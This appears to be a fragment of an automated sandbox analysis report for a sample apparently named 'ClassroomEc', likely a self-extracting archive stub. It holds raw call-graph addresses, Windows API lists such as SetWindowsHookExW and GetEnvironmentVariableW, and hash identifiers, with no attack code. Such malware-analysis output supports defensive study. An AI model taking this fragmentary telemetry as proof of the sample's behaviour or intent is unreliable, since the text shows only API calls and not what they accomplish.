a758c8 19001->19002 19003 a89450 4 API calls 19002->19003 19004 a758d5 19003->19004 19005 a89270 _DebugHeapAllocator 2 API calls 19004->19005 19006 a758e2 19005->19006 19020 a89741 codecvt 19019->19020 19021 a758b4 19020->19021 19030 a89870 19020->19030 19027 a804f0 ??3@YAXPAX 19021->19027 19025 a8975a codecvt 19025->19021 19034 a895a0 19025->19034 19037 a897e0 19025->19037 19041 a896d0 19025->19041 19027->19000 19031 a8987d codecvt 19030->19031 19032 a8989c wcscmp 19031->19032 19033 a898aa 19031->19033 19032->19033 19033->19025 19047 a895e0 wcsstr 19034->19047 19036 a895be 19036->19025 19038 a897f5 19037->19038 19039 a8981a 19038->19039 19048 a89830 memmove 19038->19048 19039->19025 19042 a896e1 codecvt 19041->19042 19046 a89718 19042->19046 19049 a88e80 19042->19049 19046->19025 19047->19036 19048->19039 19050 a890a0 4 API calls 19049->19050 19051 a88e93 19050->19051 19057 a710d0 _Error_objects ??2@YAPAXI 19056->19057 19058 a7593e 19057->19058 19059 a72370 _DebugHeapAllocator 3 API calls 19058->19059 19060 a7594a 19059->19060 19061 a89450 4 API calls 19060->19061 19062 a75957 19061->19062 19063 a89270 _DebugHeapAllocator 2 API calls 19062->19063 19064 a75964 19063->19064 19065 a89730 7 API calls 19064->19065 19066 a75974 19065->19066 19125 a804f0 ??3@YAXPAX 19066->19125 19068 a7597c 19069 a72370 _DebugHeapAllocator 3 API calls 19068->19069 19070 a75988 19069->19070 19071 a89450 4 API calls 19070->19071 19072 a75995 19071->19072 19073 a89270 _DebugHeapAllocator 2 API calls 19072->19073 19074 a759a2 19073->19074 19075 a89730 7 API calls 19074->19075 19076 a759b2 19075->19076 19125->19068 19689 a77490 19682->19689 19686 a89522 _DebugHeapAllocator 19685->19686 19687 a890a0 4 API calls 19686->19687 19688 a89534 19687->19688 19688->17058 19690 a788a0 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 3 API calls 19689->19690 19691 a7732e 19690->19691 19691->17054 19693 a7b273 19692->19693 19694 a7b271 ??3@YAXPAX LocalFree 19692->19694 19700 a7b2b0 19693->19700 19694->17079 19697 a797f0 18 API calls 19698 a7b29d 19697->19698 19699 a78460 codecvt ??3@YAXPAX 19698->19699 19699->19694 19701 a77490 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 3 API calls 19700->19701 19702 a7b282 19701->19702 19702->19697 19718 a86cf0 19703->19718 19724 a88d00 19706->19724 19708 a76b83 19709 a88e20 19708->19709 19710 a88e32 _DebugHeapAllocator 19709->19710 19728 a88be0 19710->19728 19712 a88e44 _DebugHeapAllocator 19712->17095 19732 a86ae0 19713->19732 19716 a86da0 GetLastError 19717 a8704f 19716->19717 19717->17116 19721 a734d0 19718->19721 19722 a86710 Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot CloseHandle 19721->19722 19723 a734cb 19722->19723 19723->17114 19725 a88d12 _DebugHeapAllocator 19724->19725 19726 a88d60 _DebugHeapAllocator 19725->19726 19727 a88d23 ??2@YAPAXI ??3@YAXPAX 19725->19727 19726->19708 19727->19726 19729 a88c00 19728->19729 19730 a88c02 19728->19730 19729->19712 19731 a88a30 4 API calls 19730->19731 19731->19729 19735 a86af2 19732->19735 19734 a86b25 19734->19716 19735->19734 19736 a86a80 19735->19736 19737 a86a9d WriteFile 19736->19737 19738 a86a94 19736->19738 19739 a86ac4 19737->19739 19738->19737 19739->19735 20608 a828c6 20609 a828d5 20608->20609 20610 a84340 4 API calls 20609->20610 20611 a82adb codecvt 20609->20611 20614 a828ef 20610->20614 20612 a7f230 11 API calls 20611->20612 20613 a82b31 20612->20613 20615 a7f630 codecvt ??3@YAXPAX 20613->20615 20616 a82954 20614->20616 20642 a80ba0 _CxxThrowException 20614->20642 20618 a82b3c 20615->20618 20619 a83d80 2 API calls 20616->20619 20644 a804f0 ??3@YAXPAX 20618->20644 20620 a82966 ??2@YAPAXI 20619->20620 20625 a8297f codecvt 20620->20625 20622 a82b47 20623 a7f590 codecvt ??3@YAXPAX 20622->20623 20624 a82a77 20623->20624 20626 a7b950 155 API calls 20625->20626 20627 a82a1c 20626->20627 20628 a82a37 20627->20628 20639 a82a82 codecvt 20627->20639 20629 a734f0 codecvt 11 API calls 20628->20629 20630 a82a4e 20629->20630 20631 a7f230 11 API calls 20630->20631 20633 a82a56 20631->20633 20632 a82ad0 20634 a734f0 codecvt 11 API calls 20632->20634 20635 a7f630 codecvt ??3@YAXPAX 20633->20635 20634->20611 20636 a82a61 20635->20636 20643 a804f0 ??3@YAXPAX 20636->20643 20638 a82a6c 20640 a7f590 codecvt ??3@YAXPAX 20638->20640 20639->20632 20641 a808c0 _CxxThrowException 20639->20641 20640->20624 20641->20632 20642->20616 20643->20638 20644->20622 20645 a7a8d0 20654 a7a400 20645->20654 20651 a7a926 20675 a7a5f0 20651->20675 20683 a79a70 20654->20683 20656 a7a411 20657 a797c0 5 API calls 20656->20657 20658 a7a422 20657->20658 20659 a797c0 5 API calls 20658->20659 20660 a7a433 20659->20660 20661 a78b40 GetClientRect 20660->20661 20662 a7a463 20661->20662 20663 a799f0 2 API calls 20662->20663 20664 a7a497 20663->20664 20665 a799f0 2 API calls 20664->20665 20666 a7a4c8 20665->20666 20667 a797c0 20666->20667 20724 a7d910 20667->20724 20669 a797d7 GetDlgItem 20725 a75c90 GetParent 20669->20725 20672 a799f0 20728 a78a60 GetDlgItem 20672->20728 20674 a79a1c SetWindowPos 20674->20651 20729 a78a60 GetDlgItem 20675->20729 20677 a7a604 SetFocus 20678 a7a615 codecvt 20677->20678 20679 a78a30 23 API calls 20678->20679 20680 a7a623 codecvt 20679->20680 20730 a79100 20680->20730 20682 a7a64b 20721 a78a60 GetDlgItem 20683->20721 20685 a79aa2 GetWindowLongW 20686 a79ab0 20685->20686 20687 a79ac1 20685->20687 20688 a797c0 5 API calls 20686->20688 20722 a78a60 GetDlgItem 20687->20722 20688->20687 20690 a79ae9 GetWindowLongW 20691 a79af7 20690->20691 20693 a79b08 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 20690->20693 20692 a797c0 5 API calls 20691->20692 20692->20693 20723 a7d910 20693->20723 20696 a79c0e GetParent 20697 a79c22 GetClientRect ClientToScreen ClientToScreen 20696->20697 20698 a79c66 codecvt 20696->20698 20697->20698 20699 a79cd6 SetWindowPos 20698->20699 20700 a79d7e 20699->20700 20701 a79cea 20699->20701 20702 a799f0 2 API calls 20700->20702 20703 a799f0 2 API calls 20701->20703 20714 a79d7c 20702->20714 20704 a79d01 20703->20704 20706 a797c0 5 API calls 20704->20706 20705 a79e51 GetSystemMetrics GetSystemMetrics 20705->20656 20708 a79d12 20706->20708 20707 a78b40 GetClientRect 20709 a79dbb 20707->20709 20711 a799f0 2 API calls 20708->20711 20710 a79e29 20709->20710 20713 a79dc7 20709->20713 20712 a799f0 2 API calls 20710->20712 20711->20714 20712->20705 20715 a799f0 2 API calls 20713->20715 20714->20705 20714->20707 20716 a79df4 20715->20716 20717 a797c0 5 API calls 20716->20717 20718 a79e05 20717->20718 20719 a799f0 2 API calls 20718->20719 20720 a79e27 20719->20720 20720->20705 20721->20685 20722->20690 20723->20696 20724->20669 20726 a75ca7 20725->20726 20727 a75cab GetWindowRect ScreenToClient ScreenToClient 20725->20727 20726->20672 20727->20726 20728->20674 20729->20677 20733 a78a60 GetDlgItem 20730->20733 20732 a7911f SendMessageW 20732->20682 20733->20732 20748 a78cd0 20749 a78cef GetCurrentThreadId SetWindowsHookExW 20748->20749 20750 a78d0a 20748->20750 20749->20750 20751 a78d13 GetCurrentThreadId SetWindowsHookExW 20750->20751 20752 a78d2e 20750->20752 20751->20752 20753 a78d37 20752->20753 20754 a78d5b 20752->20754 20758 a77450 20753->20758 20756 a78990 44 API calls 20754->20756 20757 a78d59 20756->20757 20761 a7d910 20758->20761 20760 a77463 EndDialog 20760->20757 20761->20760 22272 a78f20 22275 a7d910 22272->22275 22274 a78f35 GetWindowRect 22275->22274 22276 a80f2f 22277 a80f37 22276->22277 22279 a804f0 ??3@YAXPAX 22276->22279 22279->22277 20826 a83425 20827 a8342e 20826->20827 20828 a83575 20827->20828 20841 a8343a codecvt 20827->20841 20846 a804f0 ??3@YAXPAX 20828->20846 20830 a8357d 20847 a804f0 ??3@YAXPAX 20830->20847 20832 a83585 20848 a804f0 ??3@YAXPAX 20832->20848 20834 a8358d 20835 a83670 3 API calls 20834->20835 20836 a83595 20835->20836 20837 a7f630 codecvt ??3@YAXPAX 20836->20837 20838 a835a7 20837->20838 20849 a804f0 ??3@YAXPAX 20838->20849 20840 a83570 20841->20840 20843 a83f30 3 API calls 20841->20843 20842 a835af 20844 a84390 2 API calls 20842->20844 20843->20840 20845 a835b7 20844->20845 20846->20830 20847->20832 20848->20834 20849->20842 20859 a8323a 20901 a82760 20859->20901 20861 a83e10 3 API calls 20868 a82dc6 codecvt std::exception::exception 20861->20868 20862 a808c0 _CxxThrowException 20862->20868 20863 a817f0 _CxxThrowException 20863->20868 20864 a82deb 20865 a817f0 _CxxThrowException 20864->20865 20866 a833b2 codecvt 20865->20866 20870 a833cf 20866->20870 20910 a80ba0 _CxxThrowException 20866->20910 20868->20861 20868->20862 20868->20863 20868->20864 20871 a806c0 _CxxThrowException 20868->20871 20878 a82760 6 API calls 20868->20878 20879 a82650 _CxxThrowException ??3@YAXPAX ??2@YAPAXI 20868->20879 20883 a826e0 3 API calls 20868->20883 20890 a83d80 2 API calls 20868->20890 20892 a80730 _CxxThrowException _CxxThrowException 20868->20892 20893 a84b20 ??3@YAXPAX ??2@YAPAXI 20868->20893 20895 a83620 2 API calls 20868->20895 20898 a816a0 _CxxThrowException 20868->20898 20899 a841e0 ??3@YAXPAX ??2@YAPAXI 20868->20899 20900 a804f0 ??3@YAXPAX 20868->20900 20869 a83575 20911 a804f0 ??3@YAXPAX 20869->20911 20870->20869 20885 a8343a codecvt 20870->20885 20871->20868 20873 a8357d 20912 a804f0 ??3@YAXPAX 20873->20912 20875 a83585 20913 a804f0 ??3@YAXPAX 20875->20913 20877 a8358d 20880 a83670 3 API calls 20877->20880 20878->20868 20879->20868 20881 a83595 20880->20881 20882 a7f630 codecvt ??3@YAXPAX 20881->20882 20884 a835a7 20882->20884 20883->20868 20914 a804f0 ??3@YAXPAX 20884->20914 20887 a83570 20885->20887 20889 a83f30 3 API calls 20885->20889 20888 a835af 20891 a84390 2 API calls 20888->20891 20889->20887 20890->20868 20894 a835b7 20891->20894 20892->20868 20893->20868 20895->20868 20898->20868 20899->20868 20900->20868 20902 a826e0 3 API calls 20901->20902 20903 a82779 20902->20903 20904 a80730 2 API calls 20903->20904 20905 a82791 20904->20905 20906 a7d930 2 API calls 20905->20906 20908 a827a0 20906->20908 20907 a82815 20907->20868 20908->20907 20915 a82830 20908->20915 20910->20870 20911->20873 20912->20875 20913->20877 20914->20888 20918 a80c10 20915->20918 20919 a80c2a 20918->20919 20920 a80c2f 20918->20920 20921 a808c0 _CxxThrowException 20919->20921 20920->20908 20921->20920 20979 a98800 20982 a78830 20979->20982 20983 a78841 codecvt 20982->20983 20984 a78888 20983->20984 20987 a765d0 codecvt 2 API calls 20983->20987 20988 a804f0 ??3@YAXPAX 20984->20988 20986 a78890 20987->20983 20988->20986 22347 a72312 22348 a72218 22347->22348 22350 a891e0 2 API calls 22348->22350 22381 a722aa 22348->22381 22349 a71d70 GetProcAddress 22351 a7231c 22349->22351 22352 a72240 22350->22352 22353 a84cd0 codecvt ??3@YAXPAX 22351->22353 22354 a891a0 2 API calls 22352->22354 22355 a7232e 22353->22355 22356 a7224d 22354->22356 22357 a84cd0 codecvt ??3@YAXPAX 22355->22357 22358 a89160 2 API calls 22356->22358 22359 a72336 22357->22359 22360 a7225a codecvt 22358->22360 22361 a73670 codecvt 2 API calls 22359->22361 22363 a716a0 _DebugHeapAllocator 2 API calls 22360->22363 22362 a7233e 22361->22362 22364 a84cd0 codecvt ??3@YAXPAX 22362->22364 22365 a7226d 22363->22365 22366 a72346 22364->22366 22394 a804f0 ??3@YAXPAX 22365->22394 22368 a72275 22395 a804f0 ??3@YAXPAX 22368->22395 22370 a7227d 22396 a804f0 ??3@YAXPAX 22370->22396 22372 a72285 codecvt 22373 a71e40 12 API calls 22372->22373 22374 a7229b 22373->22374 22375 a722a2 22374->22375 22376 a722ac 22374->22376 22379 a84cd0 codecvt ??3@YAXPAX 22375->22379 22377 a722b7 GetLastError 22376->22377 22378 a722c4 codecvt 22376->22378 22377->22378 22380 a722d6 22377->22380 22383 a7b300 51 API calls 22378->22383 22379->22381 22382 a774e0 22 API calls 22380->22382 22381->22349 22381->22366 22384 a722de 22382->22384 22383->22380 22385 a84cd0 codecvt ??3@YAXPAX 22384->22385 22386 a722ed 22385->22386 22387 a84cd0 codecvt ??3@YAXPAX 22386->22387 22388 a722f5 22387->22388 22389 a84cd0 codecvt ??3@YAXPAX 22388->22389 22390 a722fd 22389->22390 22391 a73670 codecvt 2 API calls 22390->22391 22392 a72305 22391->22392 22393 a84cd0 codecvt ??3@YAXPAX 22392->22393 22393->22381 22394->22368 22395->22370 22396->22372 21036 a7bc1d 21039 a7bc2c codecvt SafeRWList 21036->21039 21037 a7bd97 21038 a7d320 6 API calls 21037->21038 21075 a7bdae codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21038->21075 21039->21037 21040 a86610 12 API calls 21039->21040 21041 a7bc7f 21040->21041 21042 a7bcc3 21041->21042 21043 a7bc91 21041->21043 21047 a7bcd5 21042->21047 21055 a7bd19 21042->21055 21044 a7d300 11 API calls 21043->21044 21045 a7bca8 21044->21045 21046 a7d200 ??3@YAXPAX 21045->21046 21049 a7bcb0 21046->21049 21051 a7bd17 21047->21051 21052 a7bce7 21047->21052 21048 a7c267 _Error_objects 21056 a7c2a6 ??2@YAPAXI 21048->21056 21050 a7d2b0 3 API calls 21049->21050 21053 a7bcb8 21050->21053 21067 a7d300 11 API calls 21051->21067 21057 a7d300 11 API calls 21052->21057 21054 a7bd3c 21058 a7d300 11 API calls 21054->21058 21055->21051 21055->21054 21059 a7c2bf 21056->21059 21070 a7c2ca codecvt 21056->21070 21060 a7bcfc 21057->21060 21061 a7bd51 21058->21061 21063 a7d350 InitializeCriticalSection 21059->21063 21064 a7d200 ??3@YAXPAX 21060->21064 21062 a7d200 ??3@YAXPAX 21061->21062 21065 a7bd59 21062->21065 21063->21070 21066 a7bd04 21064->21066 21068 a7d2b0 3 API calls 21065->21068 21069 a7d2b0 3 API calls 21066->21069 21067->21037 21068->21053 21069->21053 21071 a7c342 21070->21071 21077 a7c37f codecvt SafeRWList _Error_objects 21070->21077 21073 a734f0 codecvt 11 API calls 21071->21073 21072 a7c5ac 21081 a7dc60 ??2@YAPAXI 21072->21081 21074 a7c359 21073->21074 21078 a7da30 codecvt 11 API calls 21074->21078 21075->21048 21076 a7bf8b 21075->21076 21083 a7bec0 21075->21083 21090 a7bef0 codecvt 21075->21090 21079 a734f0 codecvt 11 API calls 21076->21079 21077->21072 21084 a7c402 21077->21084 21085 a7c48a ??2@YAPAXI 21077->21085 21080 a7c364 21078->21080 21133 a7bf96 codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21079->21133 21082 a7d200 ??3@YAXPAX 21080->21082 21104 a7c5ce codecvt 21081->21104 21086 a7c36c 21082->21086 21087 a734f0 codecvt 11 API calls 21083->21087 21175 a86de0 3 API calls 21084->21175 21105 a7c479 _Error_objects 21085->21105 21088 a7d2b0 3 API calls 21086->21088 21089 a7bed5 21087->21089 21088->21053 21092 a7d200 ??3@YAXPAX 21089->21092 21174 a94af0 2 API calls 21090->21174 21091 a7c422 21095 a7c431 21091->21095 21091->21105 21096 a7bedd 21092->21096 21093 a7c74d 21181 a804f0 ??3@YAXPAX 21093->21181 21098 a734f0 codecvt 11 API calls 21095->21098 21099 a7d2b0 3 API calls 21096->21099 21097 a7c762 21102 a734f0 codecvt 11 API calls 21097->21102 21103 a7c448 21098->21103 21099->21053 21100 a7c61d SafeRWList 21106 a84ec0 _CxxThrowException 21100->21106 21122 a7c669 codecvt _Error_objects 21100->21122 21101 a7bf28 21101->21076 21111 a7bf59 21101->21111 21108 a7c76d 21102->21108 21109 a734f0 codecvt 11 API calls 21103->21109 21104->21093 21104->21100 21107 a7c4fb ??2@YAPAXI 21105->21107 21110 a7c649 21106->21110 21120 a7c514 21107->21120 21113 a7da30 codecvt 11 API calls 21108->21113 21114 a7c453 21109->21114 21115 a7c650 ??2@YAPAXI 21110->21115 21110->21122 21116 a734f0 codecvt 11 API calls 21111->21116 21112 a7c04b 21117 a734f0 codecvt 11 API calls 21112->21117 21118 a7c778 21113->21118 21119 a7da30 codecvt 11 API calls 21114->21119 21115->21122 21123 a7bf70 21116->21123 21124 a7c056 21117->21124 21125 a7d200 ??3@YAXPAX 21118->21125 21126 a7c45e 21119->21126 21121 a85e30 4 API calls 21120->21121 21146 a7c54f codecvt _Error_objects 21121->21146 21173 a85a00 122 API calls 21122->21173 21127 a7d200 ??3@YAXPAX 21123->21127 21128 a7dc10 ??2@YAPAXI 21124->21128 21129 a7c780 21125->21129 21130 a7d200 ??3@YAXPAX 21126->21130 21131 a7bf78 21127->21131 21132 a7c077 21128->21132 21134 a7d2b0 3 API calls 21129->21134 21135 a7c466 21130->21135 21136 a7d2b0 3 API calls 21131->21136 21137 a7dc60 ??2@YAPAXI 21132->21137 21133->21112 21141 a7c019 21133->21141 21134->21053 21138 a7d2b0 3 API calls 21135->21138 21136->21053 21140 a7c089 21137->21140 21138->21053 21139 a7c703 21142 a734f0 codecvt 11 API calls 21139->21142 21155 a7c1dd codecvt 21140->21155 21157 a7c0bf 21140->21157 21143 a734f0 codecvt 11 API calls 21141->21143 21144 a7c714 21142->21144 21145 a7c030 21143->21145 21180 a804f0 ??3@YAXPAX 21144->21180 21148 a7d200 ??3@YAXPAX 21145->21148 21153 a734f0 codecvt 11 API calls 21146->21153 21150 a7c038 21148->21150 21149 a7c71f 21151 a734f0 codecvt 11 API calls 21149->21151 21152 a7d2b0 3 API calls 21150->21152 21154 a7c72a 21151->21154 21152->21053 21153->21072 21156 a7da30 codecvt 11 API calls 21154->21156 21178 a804f0 ??3@YAXPAX 21155->21178 21158 a7c735 21156->21158 21169 a7c0da codecvt 21157->21169 21176 a804f0 ??3@YAXPAX 21157->21176 21159 a7d200 ??3@YAXPAX 21158->21159 21161 a7c73d 21159->21161 21164 a7d2b0 3 API calls 21161->21164 21163 a7c14b 21177 a804f0 ??3@YAXPAX 21163->21177 21164->21053 21165 a7c25c 21179 a804f0 ??3@YAXPAX 21165->21179 21167 a7c156 21170 a7d200 ??3@YAXPAX 21167->21170 21171 a7c15e 21170->21171 21172 a7d2b0 3 API calls 21171->21172 21172->21053 21173->21139 21174->21101 21175->21091 21176->21163 21177->21167 21178->21165 21179->21048 21180->21149 21181->21097 21182 a82215 21191 a821b4 codecvt std::exception::exception 21182->21191 21184 a817f0 _CxxThrowException 21184->21191 21185 a8225d codecvt 21186 a8222d codecvt 21186->21185 21188 a816a0 _CxxThrowException 21186->21188 21187 a81110 _CxxThrowException 21187->21191 21188->21186 21189 a826e0 3 API calls 21189->21191 21190 a821bc codecvt 21192 a82470 4 API calls 21190->21192 21194 a82377 codecvt 21190->21194 21191->21184 21191->21186 21191->21187 21191->21189 21191->21190 21193 a82470 4 API calls 21191->21193 21195 a804f0 ??3@YAXPAX 21191->21195 21192->21194 21193->21191 21195->21191 22419 a8116c 22422 a81175 codecvt 22419->22422 22420 a812af 22455 a84080 22420->22455 22422->22420 22423 a80870 _CxxThrowException 22422->22423 22425 a8119c 22423->22425 22424 a81330 22426 a8133d 22424->22426 22460 a80ba0 _CxxThrowException 22424->22460 22427 a811b0 22425->22427 22453 a80ba0 _CxxThrowException 22425->22453 22461 a84100 22426->22461 22440 a811d2 22427->22440 22454 a80ba0 _CxxThrowException 22427->22454 22433 a80b60 _CxxThrowException _CxxThrowException 22434 a812e5 codecvt 22433->22434 22434->22424 22434->22433 22435 a813a6 22436 a80b60 2 API calls 22438 a813a8 codecvt 22436->22438 22438->22435 22438->22436 22439 a8135b codecvt 22439->22435 22466 a80ba0 _CxxThrowException 22439->22466 22441 a81268 22440->22441 22442 a80b60 2 API calls 22440->22442 22444 a8127d 22441->22444 22445 a812b1 22441->22445 22443 a8125a 22442->22443 22447 a80b60 2 API calls 22443->22447 22448 a80b60 2 API calls 22444->22448 22446 a80480 ??3@YAXPAX 22445->22446 22446->22420 22447->22441 22449 a81285 22448->22449 22450 a83d80 2 API calls 22449->22450 22451 a81297 codecvt 22450->22451 22452 a808d0 2 API calls 22451->22452 22452->22420 22453->22427 22454->22440 22456 a84094 22455->22456 22457 a84096 22455->22457 22456->22434 22458 a840c8 ??3@YAXPAX 22457->22458 22459 a840a3 ??2@YAPAXI 22457->22459 22458->22456 22459->22458 22460->22426 22462 a81355 22461->22462 22463 a84116 22461->22463 22462->22438 22462->22439 22464 a84148 ??3@YAXPAX 22463->22464 22465 a84123 ??2@YAPAXI 22463->22465 22464->22462 22465->22464 22466->22435 22616 a8195e 22617 a81967 22616->22617 22618 a80870 _CxxThrowException 22617->22618 22662 a81aba 22617->22662 22620 a8197b 22618->22620 22619 a81b7f 22623 a84b20 2 API calls 22619->22623 22621 a8198f 22620->22621 22674 a80ba0 _CxxThrowException 22620->22674 22628 a819a4 22621->22628 22675 a80ba0 _CxxThrowException 22621->22675 22625 a81b8c 22623->22625 22627 a84b20 2 API calls 22625->22627 22649 a81b9c 22627->22649 22630 a808c0 _CxxThrowException 22628->22630 22637 a819b6 codecvt 22628->22637 22629 a81b56 codecvt 22631 a808c0 _CxxThrowException 22629->22631 22652 a81d4c codecvt 22629->22652 22630->22637 22631->22652 22632 a80ba0 _CxxThrowException 22632->22649 22633 a81cc5 22633->22629 22681 a80ba0 _CxxThrowException 22633->22681 22634 a80b60 2 API calls 22642 a81c54 22634->22642 22638 a81a44 22637->22638 22640 a83e60 4 API calls 22637->22640 22641 a81a7c 22638->22641 22644 a80b60 2 API calls 22638->22644 22639 a807c0 _CxxThrowException _CxxThrowException 22639->22649 22640->22638 22643 a81a90 22641->22643 22678 a80ba0 _CxxThrowException 22641->22678 22642->22633 22642->22634 22680 a80ba0 _CxxThrowException 22642->22680 22647 a80b60 2 API calls 22643->22647 22643->22662 22646 a81a5c 22644->22646 22648 a81a6a 22646->22648 22676 a80ba0 _CxxThrowException 22646->22676 22657 a81aa5 22647->22657 22651 a80b60 2 API calls 22648->22651 22649->22632 22649->22639 22649->22642 22653 a81a72 22651->22653 22654 a83dd0 3 API calls 22652->22654 22653->22641 22677 a80ba0 _CxxThrowException 22653->22677 22656 a81de1 22654->22656 22682 a804f0 ??3@YAXPAX 22656->22682 22659 a808c0 _CxxThrowException 22657->22659 22657->22662 22659->22662 22660 a81de9 22683 a804f0 ??3@YAXPAX 22660->22683 22662->22619 22662->22629 22679 a80ba0 _CxxThrowException 22662->22679 22663 a81df1 22664 a815b0 _CxxThrowException 22663->22664 22665 a81e08 22664->22665 22684 a84180 ??3@YAXPAX ??2@YAPAXI 22665->22684 22667 a817f0 _CxxThrowException 22669 a81e17 codecvt 22667->22669 22668 a817f0 _CxxThrowException 22671 a81e66 22668->22671 22669->22667 22669->22671 22670 a81e8b 22671->22668 22671->22670 22672 a81110 _CxxThrowException 22671->22672 22673 a81600 5 API calls 22671->22673 22672->22671 22673->22671 22674->22621 22675->22628 22676->22648 22677->22641 22678->22643 22679->22619 22680->22642 22681->22629 22682->22660 22683->22663 22684->22669 21416 a7a650 21417 a7a662 21416->21417 21418 a7a66c 21416->21418 21428 a7a6b0 memset 21417->21428 21419 a7a66a 21418->21419 21421 a78ca0 11 API calls 21418->21421 21438 a78f70 21419->21438 21423 a7a686 21421->21423 21425 a72370 _DebugHeapAllocator 3 API calls 21423->21425 21426 a7a691 21425->21426 21427 a84cd0 codecvt ??3@YAXPAX 21426->21427 21427->21419 21442 a7d910 21428->21442 21430 a7a6dd SHBrowseForFolderW 21431 a7a70e SHGetPathFromIDListW 21430->21431 21436 a7a709 21430->21436 21432 a7a72f 21431->21432 21433 a7a74b SHGetMalloc 21431->21433 21434 a71d50 _DebugHeapAllocator 3 API calls 21432->21434 21433->21436 21435 a7a740 21434->21435 21437 a7a5f0 25 API calls 21435->21437 21436->21419 21437->21433 21439 a78fa2 21438->21439 21440 a78f88 21438->21440 21439->21440 21441 a77450 EndDialog 21439->21441 21441->21440 21442->21430

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 547 a75e70-a75e80 548 a75e8b-a75e98 547->548 549 a75eaf-a75ebc 548->549 550 a75e9a-a75ea9 548->550 553 a75ebe-a75ec3 549->553 554 a75ec8-a75f00 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 549->554 551 a75ead 550->551 552 a75eab 550->552 551->548 552->549 556 a76129-a7612c 553->556 557 a75f06-a75f4c ??2@YAPAXI@Z GetEnvironmentVariableW 554->557 558 a75fff-a76016 SetLastError 554->558 561 a75fe7-a75ffc ??3@YAXPAX@Z 557->561 562 a75f52-a75f5a GetLastError 557->562 559 a76029-a76045 558->559 560 a76018-a76024 558->560 564 a76047-a76052 call a75e00 559->564 565 a76063-a760b1 lstrlenA ??2@YAPAXI@Z 559->565 560->556 561->558 562->561 563 a75f60-a75f6d 562->563 568 a75fd6-a75fdf 563->568 569 a75f6f-a75f88 lstrcmpiW 563->569 564->565 577 a76054-a76060 564->577 566 a760b3-a760db GetLocaleInfoW 565->566 567 a760f2-a76123 MultiByteToWideChar 565->567 566->567 571 a760dd-a760ed _wtol 566->571 567->556 574 a75fe5 568->574 572 a75fbc-a75fd1 ??3@YAXPAX@Z 569->572 573 a75f8a-a75fba ??3@YAXPAX@Z 569->573 571->567 576 a75fd4 572->576 573->576 574->558 576->574 577->565
                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A75EC8
                                                                                                                                                      • wsprintfW.USER32 ref: 00A75EDE
                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00A75EEF
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A75EF8
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00A75F1D
                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00A7B311), ref: 00A75F43
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A75F52
                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,?), ref: 00A75F80
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00A75FA3
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00A75FCC
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00A75FF7
                                                                                                                                                      • SetLastError.KERNEL32(?), ref: 00A76003
                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00A76067
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00A7608A
                                                                                                                                                      • GetLocaleInfoW.KERNELBASE(00000000,00001004,?,0000001F), ref: 00A760D3
                                                                                                                                                      • _wtol.MSVCRT(?), ref: 00A760E4
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(000004E4,00000000,?,?,00000000,?), ref: 00A76117
                                                                                                                                                        • Part of subcall function 00A75E00: GetUserDefaultUILanguage.KERNEL32(?,00A7604C), ref: 00A75E0E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$??3@$??2@EnvironmentVariable$ByteCharDefaultInfoLanguageLocaleMultiUserWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                                      • String ID: SfxString%d
                                                                                                                                                      • API String ID: 1359506875-944934635
                                                                                                                                                      • Opcode ID: cc84bb2f5a1a85b511b0dbcdae4c9d25a77c148f5816da6e491c12d728bbfa71
                                                                                                                                                      • Instruction ID: 14b6943c9370448a825e850fbbc0fb32b73aa99c1a9a779a20feaae5f5b71208
                                                                                                                                                      • Opcode Fuzzy Hash: cc84bb2f5a1a85b511b0dbcdae4c9d25a77c148f5816da6e491c12d728bbfa71
                                                                                                                                                      • Instruction Fuzzy Hash: A58108B0E00214DFEB14CBA8CC89BAEB7B5BB44304F14866DE50EAB255D731AD86CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A74EE0
                                                                                                                                                        • Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00A99854,00A750E8), ref: 00A74F02
                                                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 00A74F1C
